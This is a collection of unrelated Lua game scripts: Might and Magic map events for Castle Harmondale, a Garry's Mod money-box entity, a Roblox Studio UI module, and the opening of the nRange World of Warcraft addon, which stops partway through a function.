evt.hint[32] = evt.str[10] -- "Bookcase"
Game.MapEvtLines:RemoveEvent(32)
evt.map[32] = function()
evt.SetDoorState{Id = 34, State = 0}
end
evt.hint[33] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(33)
evt.map[33] = function()
evt.SetDoorState{Id = 1, State = 0}
end
evt.hint[34] = evt.str[1] -- "Door"
Game.MapEvtLines:RemoveEvent(34)
evt.map[34] = function()
evt.SetDoorState{Id = 2, State = 0}
end
evt.hint[35] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(35)
evt.map[35] = function() -- function events.LoadMap()
evt.ForPlayer(-- ERROR: Const not found
"All")
if not evt.Cmp{"QBits", Value = 883} then -- Dwarven Messenger Once
if evt.Cmp{"Awards", Value = 120} then -- "Completed Coding Wizard Quest"
evt.SetNPCGreeting{NPC = 366, Greeting = 142} -- "Messenger" : ""
evt.Set{"QBits", Value = 881} -- "Raise the siege of Stone City by killing all creatures in the Barrow Downs within one week and then proceed to King Hothffar for your reward."
evt.Set{"QBits", Value = 883} -- Dwarven Messenger Once
evt.Subtract{"QBits", Value = 880} -- Barrow Normal
evt.Set{"Counter2", Value = 0}
evt.SpeakNPC{NPC = 366} -- "Messenger"
end
end
end
events.LoadMap = evt.map[35].last
evt.hint[37] = evt.str[11] -- "Arnold's Super Protein Drink"
Game.MapEvtLines:RemoveEvent(37)
evt.map[37] = function()
if not evt.Cmp{"QBits", Value = 829} then -- 1-time Castle Harm
evt.Set{"QBits", Value = 829} -- 1-time Castle Harm
evt.All.Add("Experience", 0)
for _, pl in Party do
local s, m = SplitSkill(pl.Skills[const.Skills.Bodybuilding])
pl.Skills[const.Skills.Bodybuilding] = JoinSkill(math.max(s, 7), math.max(m, const.Expert))
end
end
end
evt.hint[38] = evt.str[9] -- "Strange Torch"
Game.MapEvtLines:RemoveEvent(38)
evt.map[38] = function()
evt.MoveToMap{X = -2015, Y = 2870, Z = 1152, Direction = 524, LookAngle = 0, SpeedZ = 0, HouseId = 0, Icon = 0, Name = "0"}
end
evt.hint[39] = evt.str[9] -- "Strange Torch"
Game.MapEvtLines:RemoveEvent(39)
evt.map[39] = function()
evt.MoveToMap{X = -12372, Y = -1047, Z = 0, Direction = 2047, LookAngle = 0, SpeedZ = 0, HouseId = 0, Icon = 0, Name = "0"}
end
evt.hint[40] = evt.str[12] -- "Phasing Cauldron"
Game.MapEvtLines:RemoveEvent(40)
evt.map[40] = function()
evt.ForPlayer(-- ERROR: Const not found
"All")
if not evt.Cmp{"QBits", Value = 830} then -- 1-time phasing cauldron
evt.Set{"QBits", Value = 830} -- 1-time phasing cauldron
evt.Add{"FireResistance", Value = 20}
evt.Add{"AirResistance", Value = 20}
evt.Add{"WaterResistance", Value = 20}
evt.Add{"EarthResistance", Value = 20}
end
end
evt.hint[41] = evt.str[13] -- "Elemental Totem"
Game.MapEvtLines:RemoveEvent(41)
evt.map[41] = function()
evt.ForPlayer(-- ERROR: Const not found
"All")
if not evt.Cmp{"QBits", Value = 835} then -- Dancing Flame
evt.Set{"QBits", Value = 835} -- Dancing Flame
evt.Add{"FireResistance", Value = 10}
evt.Add{"AirResistance", Value = 10}
evt.Add{"WaterResistance", Value = 10}
evt.Add{"EarthResistance", Value = 10}
end
evt.SetSprite{SpriteId = 13, Visible = 1, Name = "sp57"}
end
evt.hint[50] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(50)
evt.map[50] = function() -- function events.LoadMap()
evt.ForPlayer(-- ERROR: Const not found
"All")
if evt.Cmp{"QBits", Value = 835} then -- Dancing Flame
evt.SetSprite{SpriteId = 13, Visible = 1, Name = "sp57"}
end
end
events.LoadMap = evt.map[50].last
evt.hint[176] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(176)
evt.map[176] = function()
evt.OpenChest{Id = 1}
end
evt.hint[177] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(177)
evt.map[177] = function()
evt.OpenChest{Id = 2}
end
evt.hint[178] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(178)
evt.map[178] = function()
evt.OpenChest{Id = 3}
end
evt.hint[179] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(179)
evt.map[179] = function()
evt.OpenChest{Id = 4}
end
evt.hint[180] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(180)
evt.map[180] = function()
evt.OpenChest{Id = 5}
end
evt.hint[181] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(181)
evt.map[181] = function()
evt.OpenChest{Id = 6}
end
evt.hint[182] = evt.str[7] -- "Cabinet"
Game.MapEvtLines:RemoveEvent(182)
evt.map[182] = function()
evt.OpenChest{Id = 7}
end
evt.hint[183] = evt.str[7] -- "Cabinet"
Game.MapEvtLines:RemoveEvent(183)
evt.map[183] = function()
evt.OpenChest{Id = 8}
end
evt.hint[184] = evt.str[7] -- "Cabinet"
Game.MapEvtLines:RemoveEvent(184)
evt.map[184] = function()
evt.ForPlayer(-- ERROR: Const not found
"All")
if evt.Cmp{"Inventory", Value = 964} then -- "Blue Dragon's Key"
evt.OpenChest{Id = 9}
else
evt.StatusText{Str = 22} -- "This cabinet requires a Blue Dragon's Key."
end
end
evt.hint[185] = evt.str[7] -- "Cabinet"
Game.MapEvtLines:RemoveEvent(185)
evt.map[185] = function()
evt.OpenChest{Id = 10}
end
evt.hint[186] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(186)
evt.map[186] = function()
evt.OpenChest{Id = 11}
end
evt.hint[187] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(187)
evt.map[187] = function()
evt.OpenChest{Id = 12}
end
evt.hint[188] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(188)
evt.map[188] = function()
evt.OpenChest{Id = 13}
end
evt.hint[189] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(189)
evt.map[189] = function()
evt.OpenChest{Id = 14}
end
evt.hint[190] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(190)
evt.map[190] = function()
evt.OpenChest{Id = 15}
end
evt.hint[191] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(191)
evt.map[191] = function()
evt.OpenChest{Id = 16}
end
evt.hint[192] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(192)
evt.map[192] = function()
evt.OpenChest{Id = 17}
end
evt.hint[193] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(193)
evt.map[193] = function()
evt.OpenChest{Id = 18}
end
evt.hint[194] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(194)
evt.map[194] = function()
evt.OpenChest{Id = 19}
end
evt.hint[195] = evt.str[3] -- "Chest"
Game.MapEvtLines:RemoveEvent(195)
evt.map[195] = function()
evt.OpenChest{Id = 0}
end
evt.hint[196] = evt.str[10] -- "Bookcase"
Game.MapEvtLines:RemoveEvent(196)
evt.map[196] = function()
local i
if not evt.Cmp{"QBits", Value = 657} then -- Membership to the School of Sorcery Scroll Shop
return
end
if evt.Cmp{"MapVar2", Value = 3} then
return
end
i = Game.Rand() % 6
if i == 3 then
return
elseif i == 4 then
i = Game.Rand() % 6
if i == 1 then
evt.Add{"Inventory", Value = 1203} -- "Fire Bolt"
elseif i == 2 then
evt.Add{"Inventory", Value = 1214} -- "Feather Fall"
elseif i == 3 then
evt.Add{"Inventory", Value = 1216} -- "Sparks"
elseif i == 4 then
evt.Add{"Inventory", Value = 1281} -- "Dispel Magic"
elseif i == 5 then
evt.Add{"Inventory", Value = 1269} -- "Heal"
end
goto _16
elseif i == 5 then
goto _17
end
evt.GiveItem{Strength = 5, Type = const.ItemType.Scroll_, Id = 0}
::_16::
i = Game.Rand() % 6
if i == 4 or i == 5 then
return
end
::_17::
evt.Add{"MapVar2", Value = 1}
end
evt.hint[197] = evt.str[10] -- "Bookcase"
Game.MapEvtLines:RemoveEvent(197)
evt.map[197] = function()
if not evt.Cmp{"MapVar1", Value = 1} then
evt.Add{"Inventory", Value = 1505} -- "Basic Cryptography"
evt.Set{"MapVar1", Value = 1}
end
end
evt.hint[198] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(198)
evt.map[198] = function() -- function events.LoadMap()
evt.ForPlayer(-- ERROR: Const not found
"All")
if evt.Cmp{"QBits", Value = 885} then -- Harm no respawn
evt.SetMonGroupBit{NPCGroup = 56, Bit = const.MonsterBits.Invisible, On = true} -- "Generic Monster Group for Dungeons"
end
end
events.LoadMap = evt.map[198].last
evt.hint[376] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(376)
evt.map[376] = function() -- function events.LoadMap()
if evt.Cmp{"QBits", Value = 585} then -- Finished constructing Golem with Abbey normal head
evt.SetMonGroupBit{NPCGroup = 57, Bit = const.MonsterBits.Hostile, On = true} -- "Group for M1"
goto _5
end
if evt.Cmp{"QBits", Value = 586} then -- Finished constructing Golem with normal head
goto _5
end
::_7::
evt.ForPlayer(-- ERROR: Const not found
"Current")
if not evt.Cmp{"QBits", Value = 2102} then -- "Promoted to Crusader"
if not evt.Cmp{"QBits", Value = 2103} then -- "Promoted to Honorary Crusader"
return
end
end
evt.ForPlayer(-- ERROR: Const not found
"All")
if evt.Cmp{"QBits", Value = 612} then -- Chose the path of Dark
evt.SetMonGroupBit{NPCGroup = 56, -- ERROR: Const not found
Bit = 0x0, On = false} -- "Generic Monster Group for Dungeons"
end
do return end
::_5::
evt.Subtract{"NPCs", Value = 395} -- "Golem"
evt.SetMonGroupBit{NPCGroup = 57, Bit = const.MonsterBits.Invisible, On = false} -- "Group for M1"
goto _7
end
events.LoadMap = evt.map[376].last
evt.hint[377] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(377)
evt.map[377] = function() -- function events.LoadMap()
if not evt.Cmp{"QBits", Value = 526} then -- Accepted Fireball wand from Malwick
return
end
if evt.Cmp{"QBits", Value = 702} then -- Finished with Malwick & Assc.
return
end
if evt.Cmp{"QBits", Value = 695} then -- Failed either goto or do guild quest
goto _14
end
if not evt.Cmp{"QBits", Value = 694} then -- "Steal the Tapestry from your associate's Castle and return it to Niles Stantley in the Mercenary Guild in Tatalia."
if not evt.Cmp{"QBits", Value = 693} then -- "Go to the Mercenary Guild in Tatalia and talk to Niles Stantley within two weeks."
return
end
if not evt.Cmp{"Counter5", Value = 336} then
return
end
else
if not evt.Cmp{"Counter5", Value = 672} then
return
end
end
evt.ForPlayer(-- ERROR: Const not found
"All")
evt.Add{"QBits", Value = 695} -- Failed either goto or do guild quest
::_14::
evt.SetMonGroupBit{NPCGroup = 60, Bit = const.MonsterBits.Hostile, On = true} -- "Group for Malwick's Assc."
evt.SetMonGroupBit{NPCGroup = 60, Bit = const.MonsterBits.Invisible, On = false} -- "Group for Malwick's Assc."
evt.Set{"BankGold", Value = 0}
evt.Subtract{"QBits", Value = 693} -- "Go to the Mercenary Guild in Tatalia and talk to Niles Stantley within two weeks."
evt.Subtract{"QBits", Value = 694} -- "Steal the Tapestry from your associate's Castle and return it to Niles Stantley in the Mercenary Guild in Tatalia."
end
events.LoadMap = evt.map[377].last
evt.hint[378] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(378)
evt.map[378] = function() -- Timer(<function>, 10*const.Minute)
if evt.Cmp{"QBits", Value = 695} then -- Failed either goto or do guild quest
if not evt.Cmp{"QBits", Value = 696} then -- Killed all castle monsters
if evt.CheckMonstersKilled{CheckType = 1, Id = 60, Count = 0} then
evt.ForPlayer(-- ERROR: Const not found
"All")
evt.Add{"QBits", Value = 696} -- Killed all castle monsters
if evt.Cmp{"QBits", Value = 697} then -- Killed all outdoor monsters
evt.ForPlayer(-- ERROR: Const not found
"All")
evt.Add{"QBits", Value = 702} -- Finished with Malwick & Assc.
evt.Subtract{"QBits", Value = 695} -- Failed either goto or do guild quest
end
end
end
end
end
Timer(evt.map[378].last, 10*const.Minute)
evt.house[416] = 380 -- ""
Game.MapEvtLines:RemoveEvent(416)
evt.map[416] = function()
if not evt.Cmp{"QBits", Value = 610} then -- Built Castle to Level 2 (rescued dwarf guy)
evt.EnterHouse{Id = 380} -- ""
return
end
if not evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
evt.EnterHouse{Id = 381} -- ""
return
end
end
evt.EnterHouse{Id = 322} -- "Sanctuary"
end
evt.house[417] = 380 -- ""
Game.MapEvtLines:RemoveEvent(417)
evt.map[417] = function()
if not evt.Cmp{"QBits", Value = 610} then -- Built Castle to Level 2 (rescued dwarf guy)
evt.EnterHouse{Id = 380} -- ""
return
end
if not evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
evt.EnterHouse{Id = 381} -- ""
return
end
end
evt.EnterHouse{Id = 125} -- "Beakers and Bottles"
end
evt.house[418] = 380 -- ""
Game.MapEvtLines:RemoveEvent(418)
evt.map[418] = function()
if not evt.Cmp{"QBits", Value = 610} then -- Built Castle to Level 2 (rescued dwarf guy)
evt.EnterHouse{Id = 380} -- ""
return
end
if not evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
evt.EnterHouse{Id = 381} -- ""
return
end
end
evt.EnterHouse{Id = 58} -- "Thel's Armor and Shields"
end
evt.house[419] = 380 -- ""
Game.MapEvtLines:RemoveEvent(419)
evt.map[419] = function()
if not evt.Cmp{"QBits", Value = 610} then -- Built Castle to Level 2 (rescued dwarf guy)
evt.EnterHouse{Id = 380} -- ""
return
end
if not evt.Cmp{"QBits", Value = 614} then -- Completed Proving Grounds without killing a single creature
if not evt.Cmp{"QBits", Value = 641} then -- Completed Breeding Pit.
evt.EnterHouse{Id = 381} -- ""
return
end
end
evt.EnterHouse{Id = 18} -- "Swords Inc."
end
evt.house[420] = 1169 -- "Throne Room"
Game.MapEvtLines:RemoveEvent(420)
evt.map[420] = function()
if evt.Cmp{"QBits", Value = 610} then -- Built Castle to Level 2 (rescued dwarf guy)
evt.EnterHouse{Id = 1169} -- "Throne Room"
else
evt.StatusText{Str = 21} -- "The door is blocked"
end
end
evt.hint[451] = evt.str[100] -- ""
Game.MapEvtLines:RemoveEvent(451)
evt.map[451] = function() -- function events.LoadMap()
if evt.Cmp{"QBits", Value = 592} then -- Gave plans to elfking
if evt.Cmp{"QBits", Value = 593} then -- Gave Loren to Catherine
goto _13
end
if not evt.Cmp{"QBits", Value = 597} then -- Gave artifact to elves
if not evt.Cmp{"QBits", Value = 595} then -- Gave false Loren to Catherine (betray)
return
end
end
goto _20
end
if evt.Cmp{"QBits", Value = 594} then -- Gave false plans to elfking (betray)
if not evt.Cmp{"QBits", Value = 595} then -- Gave false Loren to Catherine (betray)
return
end
goto _13
end
if not evt.Cmp{"QBits", Value = 595} then -- Gave false Loren to Catherine (betray)
return
end
if evt.Cmp{"QBits", Value = 597} then -- Gave artifact to elves
goto _20
end
::_16::
evt.SetTexture{Facet = 16, Name = "chb1p6"}
evt.SetTexture{Facet = 17, Name = "chb1p7"}
evt.Add{"QBits", Value = 783} -- "Find the Blessed Panoply of Sir BunGleau."
do return end
::_13::
if evt.Cmp{"QBits", Value = 659} then -- Gave artifact to arbiter
evt.SetTexture{Facet = 16, Name = "bannwc-a"}
evt.SetTexture{Facet = 17, Name = "bannwc-b"}
return
end
if not evt.Cmp{"QBits", Value = 596} then -- Gave artifact to humans
if evt.Cmp{"QBits", Value = 597} then -- Gave artifact to elves
goto _20
end
end
goto _16
::_20::
evt.SetTexture{Facet = 16, Name = "elfhuma"}
evt.SetTexture{Facet = 17, Name = "elfhumb"}
evt.Add{"QBits", Value = 783} -- "Find the Blessed Panoply of Sir BunGleau."
end
events.LoadMap = evt.map[451].last
evt.hint[501] = evt.str[2] -- "Leave Castle Harmondale"
Game.MapEvtLines:RemoveEvent(501)
evt.map[501] = function()
if evt.CheckMonstersKilled{CheckType = 1, Id = 56, Count = 0} then
evt.ForPlayer(-- ERROR: Const not found
"All")
evt.Set{"QBits", Value = 647} -- Player castle goblins are all dead
evt.SetMonGroupBit{NPCGroup = 61, Bit = const.MonsterBits.Invisible, On = false} -- "Southern Village Group in Harmondy"
evt.MoveToMap{X = -18325, Y = 12564, Z = 480, Direction = 0, LookAngle = 0, SpeedZ = 0, HouseId = 0, Icon = 8, Name = "7out02.odm"}
else
evt.MoveToMap{X = -18325, Y = 12564, Z = 480, Direction = 0, LookAngle = 0, SpeedZ = 0, HouseId = 0, Icon = 8, Name = "7out02.odm"}
end
end
-- fix for a bug where golem and messenger of the saints are visible by default
function events.AfterLoadMap()
if (not vars["Castle Harmondale NPCs hidden"]) and Game.Map.Name == "7d29.blv" then
if not (Party.QBits[585] or Party.QBits[586]) then
evt.SetMonGroupBit{NPCGroup = 57, Bit = const.MonsterBits.Invisible, On = true}
end
if not Party.QBits[647] then
evt.SetMonGroupBit{NPCGroup = 61, Bit = const.MonsterBits.Invisible, On = true}
end
vars["Castle Harmondale NPCs hidden"] = true
end
end
--[[ MMMerge additions ]]--
-- Golem quest (wizard first promotion) (mm7)
evt.Map[376] = function()
if Party.QBits[585] or Party.QBits[586] then
NPCFollowers.Remove(395)
end
end-- Golem join part is in StdQuestsFollowers.lua
-- Rest cost
function events.CalcRestFoodCost(t)
if Party.QBits[610] then
t.Amount = 0
end
end
--
function events.LeaveMap()
if Party.QBits[695] and evt.CheckMonstersKilled{1, 60, 0, 6} then
Party.QBits[696] = true
Party.QBits[702] = Party.QBits[696] and Party.QBits[697]
Party.QBits[695] = not Party.QBits[702]
end
end
Game.MapEvtLines:RemoveEvent(377)
function events.LoadMap()
if Party.QBits[526] and Party.QBits[695] and not (Party.QBits[696] or Party.QBits[702]) then
evt.SetMonGroupBit{60, const.MonsterBits.Hostile, true}
evt.SetMonGroupBit{60, const.MonsterBits.Invisible, false}
evt.Set{"BankGold", 0}
evt.Subtract {"QBits", 693}
evt.Subtract {"QBits", 694}
else
evt.SetMonGroupBit{60, const.MonsterBits.Hostile, false}
evt.SetMonGroupBit{60, const.MonsterBits.Invisible, true}
end
end
|
AddCSLuaFile( "cl_init.lua" )
AddCSLuaFile( "shared.lua" )
include( 'shared.lua' )
function ENT:Initialize()
self:SetModel( "models/props_lab/powerbox01a.mdl" )
self:PhysicsInit( SOLID_VPHYSICS )
self:SetMoveType( MOVETYPE_VPHYSICS )
self:SetSolid( SOLID_VPHYSICS )
self:SetUseType( SIMPLE_USE )
self:PhysWake()
self:SetHealth(100)
self.CD = CurTime()
end
function ENT:OnRemove()
if (self:GetMoney() > 0) then
DropMoney(self:GetMoney(), self:GetPos()) --Changing abit here
end
end
function ENT:StartTouch(ent)
if (self.CD > CurTime()) then return end
if (ent:GetClass()=="bw_money") then
self:SetMoney(self:GetMoney()+ent:GetMoney())
ent:Remove()
end
end
function ENT:Use(user)
if (self.CD > CurTime()) then return end
if (self:GetCreator() == user and self:GetMoney() > 0) then
DropMoney(self:GetMoney(), self:GetPos()+self:GetUp()*20)
self:SetMoney(0)
self:EmitSound( "ambient/alarms/klaxon1.wav" )
self.CD = CurTime()+3
end
end |
local module = {}
module.__index = module
local showing = nil
module.New = function()
local object = setmetatable({}, module)
object.scrollingFrame = Instance.new("ScrollingFrame")
object.scrollingFrame.BackgroundColor3 = settings().Studio.Theme:GetColor(Enum.StudioStyleGuideColor.MainBackground)
object.scrollingFrame.BorderColor3 = settings().Studio.Theme:GetColor(Enum.StudioStyleGuideColor.Border)
object.scrollingFrame.ScrollBarImageColor3 = settings().Studio.Theme:GetColor(Enum.StudioStyleGuideColor.ScrollBar)
object.scrollingFrame.Position = UDim2.new(0, 0, 0, 60)
object.scrollingFrame.Size = UDim2.new(1, 0, 1, -60)
object.scrollingFrame.CanvasSize = UDim2.new(0, 0, 0, 0)
object.scrollingFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y
local listLayout = Instance.new("UIListLayout")
listLayout.Padding = UDim.new(0, 1)
listLayout.SortOrder = Enum.SortOrder.LayoutOrder
listLayout.Parent = object.scrollingFrame
return object
end
module.AddChild = function(self, child)
child.Parent = self.scrollingFrame
end
module.Show = function(self)
if showing ~= nil then
showing.scrollingFrame.Parent = nil
end
showing = self
showing.scrollingFrame.Parent = _G.modules["Widget"].window
end
return module
|
local _, class = UnitClass("player");
if (class == "MONK" or class == "WARLOCK") then
--[[
The MIT License (MIT)
Copyright (c) 2015-2018 Anthony "Turncoat Tony" Goins
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
]]--
NRANGE_VERSION = "0.9.8.6";
nRange_Communication = false; -- Some people had issues, can set to true if you want
local nRange_TimeSinceLastUpdate = 0;
local nRange_UpdateInterval = 0.2;
local CLEAR, COOLDOWN, INRANGE, OUTRANGE = -1, 1, 2, 3;
local nRange_IconSet = false;
local string_format, square = string.format, sqrt;
-- Probably move this to it's own file
local YARDS = "yard"
nRange_Data = {};
local nRange_ClassInfo = {
active = false, -- Do we have a teleport active
cooldown = false, -- Set true if on cooldown
teleName = nil, -- Set the name of the teleport
summName = nil, -- Set the name of the summon
teleport = nil, -- This gets set to the spell ID for the teleport spell depending on class
summon = nil, -- Same as above but with the summon spell
buff = nil, -- spell ID for the buff if the class uses one.
message = nil, -- message to display, don't change
icon = nil, -- spell icon for displaying that shit
distance = true, -- Enable distance tracking
locked = true, -- obviously used for frame locking, keep true as the default unless you like errors when you click it
showicon = true -- Show the icon or not
};
--[[
Information about the current portal.
Astrolabe (c) James Carrothers
]]--
local nRange_Teleport = {
facing = 0,
range = 0, -- trying something
inside = false,
ping = {
x = 0,
y = 0,
bx = 0,
by = 0
},
offset = {
x = 0,
y = 0
}
};
local MinimapSize = {
indoor = {
[0] = 300, -- scale
[1] = 240, -- 1.25
[2] = 180, -- 5/3
[3] = 120, -- 2.5
[4] = 80, -- 3.75
[5] = 50, -- 6
},
outdoor = {
[0] = 466 + 2/3, -- scale
[1] = 400, -- 7/6
[2] = 333 + 1/3, -- 1.4
[3] = 266 + 2/6, -- 1.75
[4] = 200, -- 7/3
[5] = 133 + 1/3, -- 3.5
},
};
local function nRange_Reset()
nRange_Data.active = false;
nRange_ClassInfo.active = false;
ReloadUI();
end
StaticPopupDialogs["RESET_NRANGE"] = {
text = "Click reset to reset while you reset your reset.",
button1 = "Reset", OnAccept = nRange_Reset, timeout = 0, whileDead = 1,
};
nRange_Help = {
"|cff00ffffnRange " ..GAME_VERSION_LABEL.. ":|r |cFF008B8B" ..NRANGE_VERSION.."|r",
" |cFF008B8B/nrange reset|r" .. " - |cff00ffffReset nRange to it's default settings|r",
" |cFF008B8B/nrange lock|r" .. " - |cff00ffffLock nRange|r",
" |cFF008B8B/nrange unlock|r" .. " - |cff00ffffUnlock nRange|r",
" |cFF008B8B/nrange icon|r" .. " - |cff00ffffEnable or disable icons|r",
" |cFF008B8B/nrange communication|r" .. " - |cff00ffffEnable or disable addon communication(enable if you can please)|r",
};
local nRange = CreateFrame("Frame", "nRange", UIParent);
nRange:SetWidth(200);
nRange:SetHeight(40);
local nRangeText = nRange:CreateFontString(nRange, "ARTWORK", "GameFontNormal");
local nRangeDistance = nRange:CreateFontString(nRange, "ARTWORK", "GameFontNormal");
local function nRange_CreateTexture()
nRangeTexture = nRange:CreateTexture(nil, "BACKGROUND");
nRangeTexture:SetTexture(nil);
nRangeTexture:SetAllPoints(nRange);
nRange.texture = nRangeTexture;
nRangeText:SetAllPoints(nRange);
nRangeText:SetFont("Fonts\\ARIALN.TTF", 14, "OUTLINE");
if nRange_ClassInfo.distance == true then
nRangeDistance:SetAllPoints(nRange);
nRangeDistance:SetFont("Fonts\\ARIALN.TTF", 12, "OUTLINE");
nRangeDistance:SetPoint("BOTTOM", 0, -40);
end
nRange:SetMovable(false);
nRange:EnableMouse(false);
end
local function nRange_CreateIcon()
nRangeIcon = CreateFrame("Frame", "nRange_Icon", nRange);
nRangeIcon:SetFrameStrata("BACKGROUND");
nRangeIcon:SetWidth(30);
nRangeIcon:SetHeight(30);
nRangeIconTex = nRangeIcon:CreateTexture(nil, "BACKGROUND");
nRangeIconTex:SetTexture(nil); -- We'll set the texture later
nRangeIconTex:SetAllPoints(nRangeIcon);
nRangeIcon.texture = nRangeIconTex;
nRangeIcon:SetPoint("LEFT",-25,0);
nRangeIconTimer = nRangeIcon:CreateFontString(nil, "OVERLAY");
nRangeIconTimer:SetFont("Fonts\\FRIZQT__.TTF", 16, "OUTLINE");
nRangeIconTimer:SetTextColor(0,1,0);
nRangeIconTimer:SetShadowColor(0,0,0);
nRangeIconTimer:SetShadowOffset(1, -1);
nRangeIconTimer:SetPoint("CENTER", nRangeIcon, "CENTER", 1, 0);
nRangeIconTimer:SetText(nil);
end
local function nRange_Disable()
DisableAddOn("nRange");
ReloadUI();
end
local function nRange_Lock()
nRange:SetMovable(false);
nRange:EnableMouse(false);
nRange_ClassInfo.locked = true;
nRangeTexture:SetTexture(nil);
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00fffflocked|r");
end
local function nRange_Unlock()
nRange:SetMovable(true); nRange:EnableMouse(true);
nRange_ClassInfo.locked = false;
nRangeTexture:SetTexture(0, 0, 1, .5);
nRange:Show();
DEFAULT_CHAT_FRAME:AddMessage("|cFF008B8BnRange: |cff00ffffunlocked|r");
end
local function nRange_SetMessage(message_type)
local name = nRange_ClassInfo.teleport;
if message_type == COOLDOWN then
nRange_ClassInfo.message = name .. ": On Cooldown!";
nRangeText:SetTextColor(1, 0, 0);
elseif message_type == INRANGE then
nRange_ClassInfo.message = name .. ": In Range!";
if nRange_ClassInfo.distance == false then
nRangeText:SetTextColor(0, 1, 0);
end
elseif message_type == OUTRANGE then
nRange_ClassInfo.message = name .. ": Out of Range";
if nRange_ClassInfo.distance == true then
nRangeText:SetTextColor(1, 0, 0);
end
elseif message_type == CLEAR then
nRange_ClassInfo.message = nil;
nRangeIconTex:SetTexture(nil);
nRange_IconSet = false;
end
nRangeText:SetText(nRange_ClassInfo.message);
end
local function nRange_Clear()
nRange_ClassInfo.active = false;
nRange_Data.active = false;
nRange_SetMessage(CLEAR);
nRangeIconTimer:SetText(nil);
if nRange_ClassInfo.locked == true then
nRange:Hide();
end
end
local function nRange_SetClass()
if class == "WARLOCK" then
local _, _, icon = GetSpellInfo(48020);
nRange_ClassInfo.teleport = GetSpellInfo(48020);
nRange_ClassInfo.summon = GetSpellInfo(48018);
nRange_ClassInfo.buff = GetSpellInfo(48018);
nRange_ClassInfo.icon = icon;
elseif class == "MONK" then
local _, _, icon = GetSpellInfo(119996);
nRange_ClassInfo.teleport = GetSpellInfo(119996);
nRange_ClassInfo.summon = GetSpellInfo(101643);
nRange_ClassInfo.icon = icon;
end
nRange_CreateIcon();
end
local function nRange_GetDistance()
local x, y
if nRange_Teleport.inside then
x = (nRange_Teleport.ping.x + nRange_Teleport.offset.x) * MinimapSize.indoor[Minimap:GetZoom()]
y = (nRange_Teleport.ping.y + nRange_Teleport.offset.y) * MinimapSize.indoor[Minimap:GetZoom()]
else
x = (nRange_Teleport.ping.x + nRange_Teleport.offset.x) * MinimapSize.outdoor[Minimap:GetZoom()]
y = (nRange_Teleport.ping.y + nRange_Teleport.offset.y) * MinimapSize.outdoor[Minimap:GetZoom()]
end
nRange_Teleport.range = square(x * x + y * y);
if nRange_Teleport.range > 100 and class == "MONK" then nRange_Clear(); end
end
local function nRange_GetCooldown()
local name = nRange_ClassInfo.teleport;
local _, duration = GetSpellCooldown(name);
if duration and duration > 1.5 then
nRange_ClassInfo.cooldown = true;
else
nRange_ClassInfo.cooldown = false;
nRangeIconTimer:SetText(nil);
end
end
local function nRange_UpdateCooldown()
local name = nRange_ClassInfo.teleport;
local start, duration = GetSpellCooldown(name);
local cooldown, r, g, b = floor(start + duration - GetTime() + .5), 0, 0, 1;
if cooldown > 16 then
r, g, b = 0, 1, 0;
elseif cooldown > 8 then
r, g, b = 1, 1, 0;
else
r, g, b = 1, 0, 0;
end
if start > 0 and duration > 0 then
nRangeIconTimer:SetTextColor(r, g, b);
nRangeIconTimer:SetText(cooldown);
else
nRangeIconTimer:SetText(nil);
end
end
local function nRange_SetDistanceColor(distance)
if distance < 25 then
nRangeText:SetTextColor(0, 1, 0);
elseif distance > 25 and distance < 40 then
nRangeText:SetTextColor(1, .50, 0);
elseif distance >= 40 then
nRangeText:SetTextColor(1, 0, 0);
end
end
local function nRange_InRange()
if class == "MONK" then
if nRange_Teleport.range <= 40 then
return true;
else
return false;
end
else
local usable, _ = IsUsableSpell(nRange_ClassInfo.teleport);
if (not usable) then
return false
else
return true
end
end
end
local function nRange_IsActive()
if class == "WARLOCK" then
